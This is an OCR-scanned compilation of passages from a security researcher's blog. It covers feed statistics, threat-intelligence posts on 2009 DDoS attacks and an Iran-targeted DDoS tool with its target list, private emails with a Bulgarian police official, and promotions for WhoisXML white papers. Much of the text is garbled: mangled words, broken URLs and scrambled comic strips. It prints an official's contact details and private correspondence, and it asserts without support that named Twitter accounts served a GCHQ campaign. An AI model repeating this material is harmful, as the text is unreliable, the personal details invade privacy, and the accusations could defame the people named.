4, 5S Netherlands 44 12,202 21,316 64.19% 
5. "® Singapore 44 5,099 8,323 77.12% 
6 Brazil 3 ) 8297 10,356 72.87% 
7. E@ Hong Kong 3 2 2,696 4,385 75.35% 
8. & India 3 25,287 35,234 72.52% 
9. <% South Korea 3 j 5,289 7,248 71.30% 
10. @& Ukraine 3 26 4,267 7,437 76.72% 
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20000 2000 


10000 1000 


0 
2006 2008 2010 2012 2014 2016 2018 2020 


Wednesday, December 14, 2005 — Monday, July 5, 2021 


+ 2,61 3 subscribers (on average) @ 
+ 201 reach (on average) @ 


See more about your subscribers » 


Popular Feed Items 


NAME VIEWS CLICKS 

Total 1,605,710 7,999,104 
DDanchev is for Hire! 1115 73087 
Historical OSINT - Malicious Malvertising Campaig... 1482 71045 
Historical OSINT - Massive Black Hat SEO Campaign... 1414 70775 


See more about your feed items » 
[5] 
40000 


20000 


0 
2006 2008 2010 2012 2014 2016 2018 2020 
y oN 


Wednesday, December 14, 2005 — Monday, July 5, 2021 


* 2,620,336 Views of 1221 items 
™ 8,119,323 CIICKS back to the site on 1511 items 


NORTH ATLANTIC 


OCEAN 
NORTH PACIFIC 
OCEAN 


SOUTH PACIFIC 


OCEAN SOUTH ATLANTIC 


OCEAN 


Therefore after approximately 12 years of active one-man operation running one of the security 
industry’s leading security publications which is my personal blog which | originally launched in 
December, 2005 when | was working on [7]https://astalavista.com while | was studying in the 
Netherlands I’ve decided that the time has come to find an alternative medium to communicate 
the treasure trove of threat intelligence and OSINT information that I’m currently sitting on and 
have been sitting on throughout the past decade with the idea to show and present the crown 
jewels of my research to basically any sort of vetted and trusted client who’s interested in my 
research and proven methodology for fighting and disrupting the bad guys in a systematic and 
efficient way throughout the past decade. 
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It’s been a privilege and an honor to serve everyone's needs for approximately 12 years as 
an independent contractor running this blog where I’ve actually had the chance to meet and 
actually get to know some of the security industry’s leading companies and actual folks working 
within the security industry and it will continue to be a privilege and an honor to know and work 


with them in the future. 


[8] 


[9] 
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and new security measures since introduced will ensure there is not a repeat of this situation 
in future." 


They also mentioned that their Wordpress blog has also been a target of a recent attack 
automatically exploiting vulnerable Wordpres blogs : 


"IN a separate and unrelated incident a few days later, attackers used a very recent ex- 
ploit in popular blogging software Wordpress to target the ICANN blog. The attack was noticed 
immediately and the blog taken offline while an analysis was run. That analysis pointed to 
an automated attack. The blogging software has since been patched and no wider impact 
(except the disappearance of the blog while the analysis was carried out) was noted." 


Go through the [2]complete coverage of the incident, the technical details regarding it, 
and the actionable intelligence obtained for [3]the NetDevilz hacking group, in case you 
haven’t done so already. 


1. http://www. icann. org/en/announcements/announcement-03jul08-en.ht 


2. http: //ddanchev. blogspot . com/2008/06/icann-and-ianas-domain-names-hi jacked. htm 


3. http://ddanchev. blogspot . com/2008/06/update-to-photobuckets-dns-hijacking.htm 


4.7.8 The Risks of Outdated Situational Awareness (2008-07-07 15:46) 
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[17] 


Zero Day Vulnerabilities are a Community 


Exclussive offer for regular 
customers! Request a two week 
DDoS attack and get IE, Firefox 
and Opera zero day vulnerabilities 
~ only until the end of this month the basement, hell, 


decrease the || we're using to obtain 
i Odays? 


[18] 


Ensuring that as many people as 
possible are aware of Microsoft's 
latest security bulletin, improves the 
overall state of Internet security, 
ultimately better serves society, 
thereby limiting carbon dioxide 
emissions... 
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All sc is eee on pocenmen 


Such dare rierference 
with DoO's cyber assets is 
unacceptable. Initiate an 

immediate traceback! 


Our NIDS one! It's 
are 
detacting 
numerous 
traffic 
anomalies 


at some of 
our 
mailsevers. 


year and not a 
single donation in 
John Doe's entire 

lifetinne? 


equal distribution 
of income? 
“Proceed* with his 
bank accounts 
Boris, 


[21] 


deception! While 
they concentrate 
on the mail 
servers, we'll 
transmit back the 


from the Russian 
to faciliate OSINT 
through botnets. 
"Ensure your 
victory before 
starting a battie*, 
said Sun Tzu! 


Our SIGINT operations are 
consistently lacking behind 
our Russian adversaries. We 
must dominate the French 
spectum once again! 


knowing it’s teens 
without girlfriends 
behind this, I know my 
rnoney are safe. 


The Chinese are 
getting smarter 
Andrel, Last 


month they 
bought access to 
-mil and .gov 
infected hosts 
only, and took at 
this Pentagon 
tai show now 


It’s called 
“segmenting 
the attack 
population" 
Yuri. 
Perhaps we 
should print 
out new 
brochures, . 


www. stripgenerater.com 


Nyah, Nyah! Do 
I tell the French 
or open a 
disinfor mation 
channel to the 
U.S through 


www. stripgenerator.com 


It has come to our 
attention that you're 
Quite talanted for a 


cybercriminal Andrei. 
Congrats, as of today 
you serve “the family* 


and will code malware 
to stay alive. 


www stripgenerator.com 
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Awesome. 


Check this out in terms of my disappearance and possible kidnapping courtesy of Bulgaria’s 
Law Enforcement in the form of an illegal arrest using a stolen ID from my place and actual 


home molestation courtesy of local police officers who basically escorted me and held me in 
another town for a period of couple of months. 


fest regeres 


Dew Padine 


[22] 


the process of providing « maluere ana 


[24] 


Thank you very much for introducing un fo Mr Oane hex 


Dear Me Danchew 


| would wery much wektome Ube opportunity of organising 2 mocting and introducing each other. | am not vere f you are based in Bulgaria or planning 2 trip in the recent teture we can commect om Skype. My ID & albenapasove with a bane in 


Helgrum 
Louliing torward hewring trom you 
Hind regard, 


Abens 


[25] 
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[ Start Process ] [ Process List ] [ Archive ] 


Site: | ajcjobs.com v | 
Login: | aicjobs.com [ 
: aol 
Password: | careerbuilder,.com-proxy 
careerbuilder.com-socks 


jobcontrolcenter.com 
Search string; | Jobvertise.com 
militaryhire.com 
monster.com 
newmonster.com 


SS 
ee 


It’s been two months since | [l]analyzed the proprietary email and personal information 
harvesting tool targeting major career web sites - "[2]Major career web sites hit by soammers 
attack", received [3]comments from Seek.com.au and Careerbuilder.com, communicated all 
the actionable intelligence in terms of the bogus accounts used and the related IPs to the 
career web sites that bothered to show interest in the attack, to come across a ghost story 
today - [4]Jobsite hack used to market identity harvesting services : 


"A Russian gang called Phreak has created an online tool that extracts personal details 
from CVs posted onto sites including Monster.com, AOL Jobs, Ajcjobs.com, Careerbuilder.com, 
Careermag.com, Computerjobs.com, Hotjobs.com, Jobcontrolcenter.com, Jobvertise.com 
and Militaryhire.com. As a result the personal information (names, email addresses, home 
addresses and current employers) on hundreds of thousands of jobseakers has been placed 
at risk, according to net security firm Prevx." 


All your CV are NOT belong to us, All your CV are ALREADY belong to us. 


1. http: //ddanchev. blogspot .com/2008/05/major-career-web-sites-hit-by-spammers.htm 


2. http://blogs.zdnet .com/security/?p=108 


. bttp://www.builderau.com.au/news/soa/Seek-com-au-targeted-by-e-mail-harvesting-tool-/0, 339028227 , 3392889 


[30] 


[31] 


[32] 
Zdrasti Yavore, 


Attachvam ti PPT-to koeto napravih naskoro na mqsto koeto sus sigurno 
znaesh i si hodil tam poveche puti ot men. Mladi hora => borgt se i si 
otstoqvat poziicite @ Shte se radvam da komentirash, ideqta e da 
vidish nivoto na znanigta i research-a koito pravq. 


Vupreki che ytre e weekend, se interesuvah imash li jelanie/vuzmojnost 
da se vidim da piem po neshto, neoficialno i kakto se kazva vednuj 
zavinagi da se zapoznaem, i eventualno namerim nachin da rabotim 
zaedno? Ako ne, on Monday mislq che stava sushto. 


Let me know. 


Best 


[33] 
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idravey Dancho, utre shte se vidim s Albena vw 11 1 shte imam malko rabota s neya. Sled tows sojes ca ples po dire nyakuce v Yujnia perk, 

dest regards, 

thief inspector Vavor Kolev, 

dead of Cybercrime, IPR and Gambling Section and 24/7 National Contact Point for High-Tech Crime at General Directorate “Combating Organized Crime” - Ministry of Interior 
Mobile +359 BEST9S021 

tax +359 2 806500) 

Shome 4350 2 sa2ml42 


Sent via BlackBerry, 
Provides by Mobiltel 


[34] 


Perfect. Shte se chuem/SMS da se ugovorim kude i koga tochno ytre. Ima 
i nadejda za hubavo vreme @ 


Best, 


[35] 


Perfect. Shte se chuem/SMS da se ugovorim kude i koga tochno ytre. Ima 
i nadejda za hubavo vreme @ 


Best, 


[36] 


* 

fest regards, 

thief inspector Vaver Kolev, 
toad of Cyberceriae, IPR and Gambling Section and 24/7 Matlonsl Contact Point for High-Tech Crime at General Directorate “Combating Organized Crime” - Ministry of Interior 
oblle +359 e8e79S5021 

Fax +359 2 8665303 

Phome 0359 2 9828342 

bemail: chiefScyberceime be 
pemabl: ke 

bent via Slackferry, 
drowlded by Mobiltel 


[37] 
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Zdrasti Yavore, 


Jalko che ne uspehme da se vidim dnes, tui kato vupreki che mi se 
iskashe da govorim za dosta po profesionalni temi, kato che li az ti 
uvajavam rabotata poveche otkolkoto ti moqta, i nqma kak da ti namekna 
za nqkoi points koito me bezpokogt i vuprosi koito iskah da te pitam. 
4z go davam profesionalno i straight to the point, nadqvam se i ti i 
vednuj zavinagi da si produljim po profesionalnig si put i eventualno 
nqkoi den, ako se naloji da se poluchi neshto productivno ot facta che 


se imame kato kontakti. 


Vuprosi: 

- Koga shte moga da si vzema dush na spokoistvie, i kak shte stane tova? @ 
- Centralna Cooperativna Banka tvurdi (do rabotodatelq mi) che ne 

"moje da svurje imeto mi sus smetkata” za poluchavane na plashtane ot 
rabotodatelg mi CBS Interactive, chast ot CBS Corporation, za PRUV put 

za poslednite 2 godini i polovina. Shte probvam sus trite si imena - 

DANCHO EEE] DANCHEV, shte se poluchi li tozi put? 


Points: 

- Az neznam dali vuobshte poglejdash research-a koito ti prashtam (2 
presentations so far, sus permission), no sled tezi "projectori"™ imam 
problemi sus sigurnostta si, v smisul takuv poslednoto neshto ot koeto 
imam nujda e NEDOVERIE za socialno-orientiranata mi rabota na 
nejdunarodno nivo, koqto nqma nishto obshto sus neshtata koito se 
Sluchvat v rodinata mi - BULGARIA, a ako eventualno ngqkoga ima TI si 
the point of contact for anything BG related! 


Priqten weekend, i shte se radvam na otgovorite ti, ili v nai-dobrig 
Sluchai nqkakvo razvitie v pravilnata (pone spored men) posoka. 


5 uvajenie, 


Ideast! Oancho, 

Snte ainesh 1i dnes prez GOO , kakto se rarbrahee ra cholo 17:30-18:00 ? 
best regerds, 

thief inspector Yavor Colev, 

tad of Cybercrime, IPR and Gambling Section and 24/7 National Contact Soiat for High-Tech Crime at Geseral Olrecterate “Combating Organized Crime” - Ministry of Interior 
‘oblle +359 se870Se21 

Fax 2359 2 9665203 

Phone +359 2 OR2RI42 

pemadl: chiefiicyberceime be 

bemail: javor koleviemes] com 

bent vie Glack#erry, 

Srowided by Mobiltel 


[39] 
Zdrasti Yavore, 


Ne predpochitash 1i da piem kafe nqkude navun, po neoficialeno da 
govorim? S Taxi sum vse pak..., NDK parkove-te sa blizo @ 


Shte se radvam da uspeem da se coordinirame i da se vidim+govorim 
dnes. Let me know. 


Best, 
Dancho 


[40] 
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erin 
BlackBerry 


Related resources: 
https://twitter.com/ykolev 


https://twitter.com/dansbg 

https://twitter.com/bo _go 

https://twitter.com/tstsvetanov/status/6051397340 
https://web.archive.org/web/20091130172926/https://twitter.com/dansbg 
https://web.archive.org/web/20100818222802/http://twitter.com/boiko 
https://web.archive.org/web/20090523162911/http://twitter.com/sergeystanish ev 
https://web.archive.org/web/20091110153835/http://twitter.com/bo _go 
https://twitter.com/georgeparvanov/status/93951503504654336 


https://search.wikileaks.org/?query=yavor+kolev &exact _phrase= S&any _of= &exclude 
_words= &document_date_start= &document_date_end= &released date _start= &released 
_date_end= G&include external sources=True &new _search=True &order_by=most_relevant 
#results 


https://ddanchev.blogspot.com/2020/07/dancho-danchevs-disappearance-2010.html 
https://ddanchev.blogspot.com/2019/11/dancho-danchevs-disappearance-2010.html 
https://ddanchev.blogspot.com/2021/02/dancho-danchevs-disappearance-2010.html 
https://ddanchev.blogspot.com/2019/04/dancho-danchevs-2010-disappearance.html 
https://ddanchev.blogspot.com/2021/03/dancho-danchevs-disappearance-2010.html 
https://ddanchev.blogspot.com/2020/12/how-i-got-robbed-and-beaten-and.html 


God bless and let’s don’t forget about the rest! 


1. https://1.bp. blogspot .com/-XhPAGG9OV-w/YOSOuhC7KBI/AAAAAAAANmK/Zt cJQZBuLdORoUqm2e 1SCxUE80 jkMXE2ACLCBGASYHQ 
2. https://1.bp. blogspot .com/-fyAppFg-HI8/YOSaD8XkTdI/AAAAAAAANmO/MH1d12vThes_LUUwcxZxJYIfd2LQfXnZACLCBGASYHQ 
3. 
4. https://1.bp. blogspot .com/—gh296n JAQKw/YOSaEM94881/AAAAAAAANm4/9j 2k-w1 QWHONfUXM8sPye2GBErBLMHkogCLcBGAsYHQ 
5. https://1.bp. blogspot . com/-fcd1WKq5MyQ/YOSaE janKbI /AAAAAAAANm8 /rzxoJFY1VfETv7V7vU70EIHCewR~SupkACLcBGASYHQ 
6. 
7. peeps://astalavista.con/ 
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. https://1.bp.blogspot .com/-Rt- 1PpB1f£LE/YOSb-OpHRGI/AAAAAAAANnU/1WwyP3405 j IMKXLJBEKYumDJ Juj oOrnPACLcBGAsYHQ 
s960/164054370_167689411839410_514368889897 1486964 _n. 


oOo 


"beep//1.opbLogspotcom/-UBsgehvpSh/YOSb- og AAA ine ai UvRRUTHRFSDS ID VEBPLVSotaS OLB 
0. 
11. ttps://1.bp.blogspot.com/-_219wNqF0xc/YOScRhD-1X1I/AAAAAAAANoQ/0C7cCSP9e30 j PmAW46LHHJcfmj jpAZ31wCLcBGAs 
12. 
14. https://1.bp.blogspot.com/-yANqshp-ZiQ/YOScQIGh3FI/AAAAAAAANoA/usAKhny 12BcbP-Crrsy j oAWSZiC9MisiQCLcBGAs 
15. 
16. 
17. bttps://1.bp.blogspot.com/-KyzPa_jdGtI/YOScH1k3W1I/AAAAAAAANno/KmOBDQNHgHY 2pTgkrWoPxJNj£1jV6TXxACLcBGAs 
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py 


9. 
0. ttps://1.bp.blogspot.com/-4-RIGKYD90k/YOScIS8mg21/AAAAAAAANns/S4HX50E mDYGcs38NhNMt Jbpv jKjUJy9gCLcBGAs 
21. 
22; 
23. 
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25. 


27. 
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29. 
30. 
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33. 
34. 
2D. 
36. 
31, 
38. 
39. 
40. 


HQ/s1395/Misc_17.png 


17.7.4 Historical OSINT - An Analysis of the South Korean/U.S DDoS Attacks Circa 
2009 (2021-07-09 23:56) 


During the last couple of days, | was getting harder to resist not publishing some of literally 
moronic commentary on the DDos attacks, thankfully not made 


by people | know in person or virtually. From the "we know they did it but we don’t have data 
to prove it", to the very latest and most disturbing commment 


by a U.S intelligence 


Why disturbing? Because that’s exactly what the person - controversial to the common wisdom 
you don’t need a team to launch this old school amateur-ish http 


request flooder - 
Key summary points: 


- if such a small botnet with such a noisy and amateur-ish request flooder can shutdown the 
U.S FCC for days, | wonder what would have happened to the rest 


of the sites in the target list if the size of the botnet and sophistication of DDoS techniques 
improved 


Let me continue in this line of thought - or they secretly brainwash the Teletubies and infiltirate 
he hearts and minds of children across the globe, a future 


generation of pro-North Korean youngerts. Or they could secretly become a Russian Business 
Network franchise, now try sending an abuse notice to the non-existent 


North Korean ISPs. They could, 


The Web is abuzz with news reports regarding the ongoing DDoS (distributed denial of service 
attack) 


The attacks which originally took off in the 4th of July weekend, target 26 Sourth Korean and 
American government sites and financial institutions. 


The W32.Dozer comes in the form of an email attachment 
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Upon execution the trojan attempts to download the list of targets from three apparently com- 
promised servers based in Germany, the U.S and Austria. 


213.23.243.210 - Mannesmann Arcor Telecommunications AG & Co 


216.199.83.203 - FDN.com 


213.33.116.41 - Telekom Austria Aktiengesellschaft 


75.151.32.182 


92.63.2.118 


75.151.32.182 


202.14.70.116 


201.116.58.131 


200.6.218.194 


163.19.209.22 


122.155.5.196 


newrozfm.com 


text string “get/China/DNS 


The word china within the malware code, the 


http://www.virustotal.com/analisis/7dee2bd4e317d12c9a2923d0531526822cfd37eabf d- 
7aecc74258bb4f2d3a643-1247001891 


http://www.virustotal.com/analisis/1d1814e2096d0ec88bde0c0c5122f1d07d10 - 
ca743ec5d1a3c94a227d288f05a7-1246990042 


http://www.virustotal.com/analisis/7c6c89b7a7c31bcb492a581dfb6c52d09dff - 
ca9107b8fd25991c708a0069625f-1246990249 


http://www. virustotal.com/analisis/f9feee6ebbc3dc0d35eea8bfO0fc96cf075d - 
59588621b0132b423a4bbf4427d4-1247006555 


17.7.5 


17.7.6 


17.7.7 


Free Chapter - Upcoming Personal Memoir! (2021-07-11 02:54) 
Upcoming Personal Memoir - Pre-Orders Accepted! (2021-07-11 03:05) 


Profiling "Nedasites" - A DDoS Attack Tool Campaign Aiming to Target Iran 
Prior to the 2009 Election - An OSINT Analysis (2021-07-12 08:06) 


[1] 
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G 


& Nedasites v4.1L a Leaked 


1. Fars News.txt 1.14MB (URL: 296 0% error) 
1.Gerdab.txt 48.4KB (URL: 258 0% error) 

i 2. IRNAtxt 

i 2. Raja News.txt 

i 3. Keyhan.txt 


Wi 3. Tabnak.COM.txt 
4. AILURLSs.txt 1.24MB (URL: 25 24% error) 


PPE PERO EOE PEE EEO PO COG eG OC AOAC CEEOL Pe On eng 


I’ve recently stumbled upon a unique DDoS tool which is basically enticing users into down- 
loading it and launching DDoS attacks against a pre-defined list of Iran-based government and 
various other Iran-based targets which appears to have been originally released during the 
2009 election in Iran. 


In this post I'll provide actionable intelligence and discuss in-depth the campaign including 
the actual tool and provide the actual list of targeted URLs including the actual MD5 for the 
malicious DDOS tool and discuss in-depth the actual crowd-sourcing DDoS campaign which was 
originally lauched during the 2009 election in Iran. 


It appears that back in 2009 a tiny group of folks including companies actually organized an 
online spree to help and support Iran’s activists and protestors with technologies and access to 
free service which basically violates the law and should be considered a dangerous precendent 
in the context of assisting Iran-based activists and protestors. Therefore I’ve decided to take a 
deeper look inside the trend that took place internationally back in the 2009 Iran-based election 
and offer practical and relevant technical and actionable intelligence information on the actual 
infrastructure behind the campaign including its participants. 


Related domains and URLs known to have been involved in the campaign: 
https://Ixkghnyg2owy6scd.onion 

http://iran.whyweprotest.net/ 

http://haystack.austinheap.com/ 

http://www.haystacknetwork.com/ 

http://iproxyiran.tk/ 

http://iranpetitie.wordpress.com/ 

https://davepack.net/retweetforiran.html 

https://iranfree.cryptocloud.net/ 
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4.7.9 Fake Porn Sites Serving Malware - Part Two (2008-07-08 10:24) 


What we’ve go here is the same malware gang using the very same [1]malicious ISP among 
the ones you rarely see in any report, continuing to crunch out domain redirectors using the 
same templates for fake porn sites. And since some of the fake sites are actual redirectors, 
periodically revisting them leads to more fake codecs and even more actionable intelligence 
into the nature of their practices, and which are the ISPs proving them with hosting services 
for several consecutive years. 


The main redirector in this campaign popular-adult.com is also responding to : 
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http://servers-info.com/ 
MD5: 25bc5507934756a836e574e9b43f8b3a - [2]Detection rate 


Sample official download location of the actual DDoS application: 


https://sites.google.com/site/nedasites 
Sample targeted URLs and domains list: 
http://keyhannews.ir 
http://www.iran-newspaper.com 
http://www.irna.com 
http://www.irna.ir 
http://www2.irna.com 
http://www5.irna.com 
http://www.irna.net 
http://www.tabnak.com 
http://www.farsnews.com 
http://english.farsnews.com 
http://shahabnews.com 
http://www.rajanews.com 
http://www.khamenei.ir 
http://www.ahmadinejad.ir 
http://www.gerdab. ir 
http://www.bornanews.com 
http://www.bornanews.ir 
http://www.leader.ir/langs/en 
http://www. president. ir/fa/ 
http://www.mod.ir 
http://www.isna.ir 
http://www.justice.ir 

http://www. presstv. ir 
http://www.police.ir 
http://mfa.gov.ir 
http://sahandnews.com 
http://www.farsnews.net 
HAMSEDA.IR - theplanet.com 
HAMSHAHRIONLINE.IR - cogentco.com 
AYANDENEWS.COM - theplanet.com 
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ASRIRAN.COM - theplanet.com 
SHIA-NEWS.COM - theplanet.com 
SHAFAF.IR - theplanet.com 
SIBNA.IR - theplanet.com 
SAYENEWS.COM - theplanet.com 
KAYHANNEWS.IR - theplanet.com 
RESALAT-NEWS.COM - iweb.com 
DEILAMNEWS.COM - iweb.com 
KHORASANNEWS.COM - abac.com 
JAHANNEWS.COM - theplanet.com 
JARASNEWS.COM - theplanet.com 
POOLNEWS.IR - theplanet.com 
PARSINE.COM - theplanet.com 
BUSHEHRNEWS.COM - theplanet.com 
TEBNA.COM - theplanet.com 
IWNA.IR - theplanet.com 
ALBORZNEWS.NET - theplanet.com 
ERAMNEWS.IR - theplanet.com 
AYANDENEWS.COM - theplanet.com 
JOMHOURIESLAMI.COM - iweb.com 


Something else that’s also worth emphasizing on in terms of the Iran 2009 election is that the 
U.K’s GCHQ has also been busy attempting to track down protestors including activists and 
has been busy working on an election specific and GCHQ owned URL shortening service which 
| managed to profile and expose [3]here including the following still active Twitter accounts 
and URLs known to have been involved in the GCHQ campaign to monitor and track down Iran 


2009 election protesters and activists: 
https://twitter.com/2009iranfree 
https://twitter.com/MagdyBasha123 
https://twitter.com/TheLorelie 
https://twitter.com/Jim _Harper 
https://twitter.com/angelocerantola 
https://twitter.com/recognizedesign 
https://twitter.com/akhormani 
https://twitter.com/FNZZ 
https://twitter.com/GlenBuchholz 
https://twitter.com/enricolabriola 
https://twitter.com/katriord 
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https://twitter.com/ShahkAm147 
https://twitter.com/Pezhman09 
https://twitter.com/jimsharr 
https://twitter.com/blackhatcode 
Stay tuned! 


1. https://1.bp.blogspot.com/-1EZU5f£BS1Rg/YOsm5aXgKnI /AAAAAAAANro/YzZOHSY7g0EEe85QSext 8a_Kk_Syp0_CQwCLcBGAsYHQ 
s626/Nedasites/2B4.1L.png 


2. https://www.virustotal .com/gui/file/7dee2bd4e317d12c9a2923d0531526822cfd37 eabfd7aecc74258bb4f 2d3a643/detec 
3. https://medium.com/@danchodanchev/exposing-gchqs-url-shortening-service-and-its-involvement-in-iran-s-20 


09-election-protests-6c6a9282630 


17.7.8 Who’s Behind the Conficker Botnet? - An OSINT Analysis for WhoisXML API 
(2021-07-22 18:19) 


Ww 


WhoisX/ViLAPI 


Dear blog readers, 


This is Dancho and | wanted to let everyone know of a series of recently released white papers 
and case studies courtesy of me for my employer - [1]WhoisXML API detailing the activities of 
numerous fraudulent and malicious online gangs and enterprises. 
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The fourth white paper entitled "[2]Who’s Behind the Conficker Botnet? - An OSINT Analysis" 
we decided to offer in-depth and actionable threat intelligence on infamous Conficker malware 
and offer a unique peek inside their domain portfolio based on the vast and in-depth real-time 
and historical WHOIS database courtesy of WhoisXML API. 


Catch up with some of the previous released white papers and case studies courtesy of me 
[3]here. 


Stay tuned! 
1. 


2. https://drive.google.com/file/d/1_opLSHGo4JeV9tmkSQ0n0jbx99i4wKTN/view?usp=sharing 


3. https://main.whoisxmlapi.com/white-papers 


17.7.9 Using Maltego and WhoisXML API's Real-Time and Historical WHOIS Database 
to Profile A Currently Active CoolWebSearch Domains Portfolio - An OSINT 
Analysis for WhoisXML API (2021-07-22 18:19) 


Ww 


WhoisX/ViLAPI 


Dear blog readers, 


This is Dancho and | wanted to let everyone know of a series of recently released white papers 
and case studies courtesy of me for my employer - [1]WhoisXML API detailing the activities of 
numerous fraudulent and malicious online gangs and enterprises. 

The third white paper entitled "[2]Using Maltego and WhoisXML API’s Real-Time and Historical 
WHOIS Database to Profile A Currently Active CoolWebSearch Domains Portfolio - An OSINT 
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Analysis" we decided to offer in-depth and actionable threat intelligence on infamous CoolWeb- 
Search spyware enterprise and offer a unique peek inside their domain portfolio based on the 
vast and in-depth real-time and historical WHOIS database courtesy of WhoisXML API. 


Catch up with some of the previous released white papers and case studies courtesy of me 
[3]here. 


Stay tuned! 


1. https: //whoisxmlapi.com/ 


2. https://drive.google.com/file/d/1dpiHRDTHCgHQDocR500H5qH1ef jBA7s3/view?usp=shar ing 


3. https://main.whoisxmlapi.com/white-papers 


17.7.10 Exposing a Currently Active NSO Spyware Group’s Domain Portfolio - An 
OSINT Analysis for WhoisXML API (2021-07-22 18:19) 


Ww 


WhoisX/ViLAPI 


Dear blog readers, 


This is Dancho and | wanted to let everyone know of a series of recently released white papers 
and case studies courtesy of me for my employer - [1]WhoisXML API detailing the activities of 
numerous fraudulent and malicious online gangs and enterprises. 


The second white paper entitled "[2]Exposing a Currently Active NSO Spyware Group’s Domain 
Portfolio - An OSINT Analysis" we decided to offer in-depth and actionable threat intelligence 
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on the recent NSO Spyware Group campaigns internationally and offer a unique peek inside 
their domain portfolio based on the vast and in-depth real-time and historical WHOIS database 
courtesy of WhoisXML API. 


Catch up with some of the previous released white papers and case studies courtesy of me 
[3]here. 


Stay tuned! 


1. https://whoisxmlapi.com/ 


2. https://drive.google.com/file/d/1uyBpcjep- tWEHAKDNraA8WEHBmC JNOdF/view?usp=shar ing 


3. https: //main.whoisxmlapi.com/white-papers 


17.7.11 Exposing a Currently Active Domain Portfolio of Currently Active High- 
Profile Cybercriminals Internationally - An OSINT Analysis for WhoisXML API 
(2021-07-22 18:19) 


[1] 


Ww 


WhoisX/ViLAPI 


Dear blog readers, 


This is Dancho and | wanted to let everyone know of a series of recently released white papers 
and case studies courtesy of me for my employer - [2]WhoisXML API detailing the activities of 
numerous fraudulent and malicious online gangs and enterprises. 


The first white paper entitled "[3]Exposing a Currently Active Domain Portfolio of Currently 
Active High-Profile Cybercriminals Internationally" we took a sample data set consisting of 
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well-known cybercriminal gang and lone cybercriminals personal email addresses which we 
obtained using Technical Collection and offered a unique peek inside their domain portfolio 
based on the vast and in-depth real-time and historical WHOIS database courtesy of WhoisXML 
API. 


Catch up with some of the previous released white papers and case studies courtesy of me 
[4]here. 


Stay tuned! 


1. https://1.bp.blogspot.com/-M4VeWiV1G6I/YPkBpBNCOgI / AAAAAAAANr8/EMCg619r71sNsvYM5- JVI6VHsN_9aSwxgCLcBGAsYHQ 
s474/Misc_650.png 
2. https://whoisxmlapi.com/ 


3. https://drive.google.com/file/d/1x2jie9-g5521L8hbJEO_xaRfOvmbevhQ/view?usp=shar ing 


4. https: //main.whoisxmlapi.com/white-papers 


17.7.12 Recommended Song of the Day! (2021-07-22 18:20) 


Dear blog readers, 


I’ve decided to share a high-profile and recently track with everyone to keep the spirit of the 
scene and the industry and to basically empower you to do your work more efficiency. Keep 
up the good work! 


Stay tuned! 


17.7.13 Exposing a Currently Active WannaCry Ransomware Domains Portfolio - An 
OSINT Analysis for WhoisXML API (2021-07-22 18:20) 


[1] 
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Ww 


WhoisX/ViLAPI 


Dear blog readers, 


This is Dancho and | wanted to let everyone know of a series of recently released white papers 
and case studies courtesy of me for my employer - [2]WhoisXML API detailing the activities of 
numerous fraudulent and malicious online gangs and enterprises. 


The seventh white paper entitled "[3]Exposing a Currently Active WannaCry Ransomware Do- 
mains Portfolio - An OSINT Analysis" we decided to offer in-depth and actionable threat intelli- 
gence on infamous WannaCry ransomware and offer a unique peek inside their domain portfolio 
based on the vast and in-depth real-time and historical WHOIS database courtesy of WhoisXML 
API. 


Catch up with some of the previous released white papers and case studies courtesy of me 
[4]here. 


Stay tuned! 


1. https://1.bp. blogspot .com/-fqNeIa3N26U/YPmW_SqF6QI/AAAAAAAANSS/biCYO1IxeAo_FJYZxqwP7EeeYnu3IUnmgCLcBGAsYHQ 
s474/Misc_650. png 
2. https://whoisxmlapi.com/ 


3. https: //drive. google. com/file/d/137rQQjia63s6-z6PTbInBiEI 1gpD2gC6/view?usp=sharing 


4. https://main.whoisxmlapi.com/white-papers 


17.7.14 Exposing a Currently Active Cyber Jihad Domains Portfolio - An OSINT Anal- 
ysis for WhoisXML API (2021-07-22 18:20) 


[1] 
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Ww 


WhoisX/ViLAPI 


Dear blog readers, 


This is Dancho and | wanted to let everyone know of a series of recently released white papers 
and case studies courtesy of me for my employer - [2]WhoisXML API detailing the activities of 
numerous fraudulent and malicious online gangs and enterprises. 


The sixth white paper entitled "[3]Exposing a Currently Active Cyber Jihad Domains Portfolio - 
An OSINT Analysis" we decided to offer in-depth and actionable threat intelligence on various 
cyber jihad themed and related domains including their owners and offer a unique peek inside 
their domain portfolio based on the vast and in-depth real-time and historical WHOIS database 
courtesy of WhoisXML API. 


Catch up with some of the previous released white papers and case studies courtesy of me 
[4]here. 


Stay tuned! 


1. https://1.bp.blogspot . com/-MYgpVeSgGCg/YPmWtx_ZMsI/AAAAAAAANSk/p90Q_dtJ2g8kce_ICSKxVvbJj0£5Szr-wCLcBGAsYHQ 
s474/Misc_650.png 
2. https://whoisxmlapi.com/ 


3. https://drive.google.com/file/d/1c7uin7WfRWXksIYZWHsG6pE_Psclgdyx/view?usp=shar ing 


4. https: //main.whoisxmlapi.com/white-papers 
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17.7.15 Exposing a Currently Active Domain Portfolio Managed and Operated by 
Members of the Ashiyane Digital Security Team - An OSINT Analysis for 
WhoisXML API (2021-07-22 18:20) 


[1] 


Ww 


WhoisX/ViLAPI 


Dear blog readers, 


This is Dancho and | wanted to let everyone know of a series of recently released white papers 
and case studies courtesy of me for my employer - [2]WhoisXML API detailing the activities of 
numerous fraudulent and malicious online gangs and enterprises. 


The fifth white paper entitled "[3]Exposing a Currently Active Domain Portfolio Managed and 
Operated by Members of the Ashiyane Digital Security Team - An OSINT Analysis" we decided to 
offer in-depth and actionable threat intelligence on the domain portfolio owned and operated 
by the infamous Ashiyane Digital Security Team and offer a unique peek inside their domain 
portfolio based on the vast and in-depth real-time and historical WHOIS database courtesy of 
WhoisXML API. 


Catch up with some of the previous released white papers and case studies courtesy of me 
[4]here. 


Stay tuned! 


1. bttps://1.bp. blogspot .com/-Ng8i4QuZaXE/YPmWQYDGh61 /AAAAAAAANSc/CqF yVLd1tEcV370U510WnPg5QZMWhH7 twCLcBGAsYHQ 
s474/Misc_650. png 
2. https://whoisxmlapi.com/ 


3. https://drive.google.com/file/d/1dxWCO26aqpPYPGikBxmn jzrEBI1ETqH- /view?usp=sharing 


4. https://main.whoisxmlapi.com/white-papers 
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17.7.16 Two Persons on the U.S Secret Service Most Wanted Cybercriminals List 
Run a Managed Android Malware Enterprise Including a Black Energy DDoS 
Botnet - An OSINT Analysis (2021-07-27 12:07) 


@ 


potekhini4@bk.ru 


® 


agressivex.com 


ANDROID 
eo, 
com.example. livemusay.myapplica... 


[1] 


Dear blog readers, 


